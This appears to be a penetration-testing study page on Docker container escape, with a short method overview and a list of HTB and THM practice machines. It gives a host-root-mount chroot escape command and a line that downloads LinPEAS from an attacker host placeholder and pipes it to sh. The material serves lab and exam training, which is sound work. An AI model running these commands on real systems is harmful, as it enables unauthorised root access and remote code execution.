Docker and Container Escape: practice machines and key commands
Containers share the host kernel, so a misconfiguration can turn a shell inside one into root on the host. First confirm you are in a container by checking /.dockerenv, cgroups and the process list. Then look for a mounted Docker socket, membership in the docker or lxd group, privileged mode, dangerous capabilities or host paths mounted read-write. With docker group access you can start a new container that mounts the host root filesystem and chroot into it. Internal networks are another target: container to container traffic often exposes services that are closed to the outside. In exams and labs, check for secrets in environment variables and image layers as well. The boxes below involve Docker either as the foothold or the escalation.
Key commands
Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
Docker Host Root Filesystem Mount Escape
Spawn privileged docker container mounting host root filesystem to /host.
docker run -v /:/host -it alpine chroot /host /bin/bashInternal Loopback Services & Listening Ports
Identify services running locally on 127.0.0.1 not exposed on external interfaces.
ss -tulpn | grep LISTENLinPEAS Direct Memory Execution
Download and execute LinPEAS directly in bash memory without writing to disk.
curl -L http://{LHOST}:8000/linpeas.sh | sh
Keep going
- Methodology: Phase 07: Privilege Escalation & Lateral Movement
- Cheatsheet: Linux PrivEsc & TTY
Docker and Container Escape machines (7)
Machines are matched by their technique tags. 7 Linux.
Easy (1)
| Machine | Platform | OS |
|---|---|---|
| Busqueda | HTB | Linux |
Medium (4)
| Machine | Platform | OS |
|---|---|---|
| Dogcat | THM | Linux |
| Ready | HTB | Linux |
| Runner | HTB | Linux |
| UltraTech | THM | Linux |
Hard (2)
| Machine | Platform | OS |
|---|---|---|
| Borderlands | THM | Linux |
| Kotarak | HTB | Linux |
Related techniques
Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox